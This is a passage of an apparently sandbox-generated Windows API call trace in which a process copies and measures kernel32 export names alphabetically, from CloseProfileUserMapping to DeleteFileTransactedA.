lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.220] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.220] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.220] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.220] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.220] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.220] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.220] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.220] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.221] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.221] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.221] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.221] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.221] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.221] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.221] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.221] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.221] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.221] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.221] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.221] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.221] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.221] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.221] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.221] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.221] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.221] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.221] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.222] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.222] lstrlenA (lpString="COPYFILEA") returned 9 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.222] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.222] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.222] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.222] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.222] lstrlenA (lpString="COPYFILEW") returned 9 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.222] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.222] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.222] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.222] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.222] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.222] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.222] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.222] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.222] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.222] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.222] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.223] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.223] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.223] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.223] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.223] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.223] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.223] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.223] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.223] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.223] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.223] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.223] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.223] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.223] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.223] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.223] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.223] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.223] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.223] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.224] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.224] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.224] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.224] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.224] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.224] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.224] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.224] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.224] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.224] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.224] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.224] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.224] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.224] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.224] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.224] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.224] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.224] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.225] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.225] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.225] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.225] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.225] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.225] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.225] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.225] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.225] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.225] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.225] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.225] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.225] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.225] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.225] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.225] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.225] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.225] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.225] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.226] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.226] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.226] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.226] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.226] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.226] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.226] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.226] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.226] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.226] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.226] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.226] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.226] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.226] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.226] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.226] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.226] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.226] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.226] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.227] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.227] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.227] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.227] lstrlenA (lpString="DELETEATOM") returned 10 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.227] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.227] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.227] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.227] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") 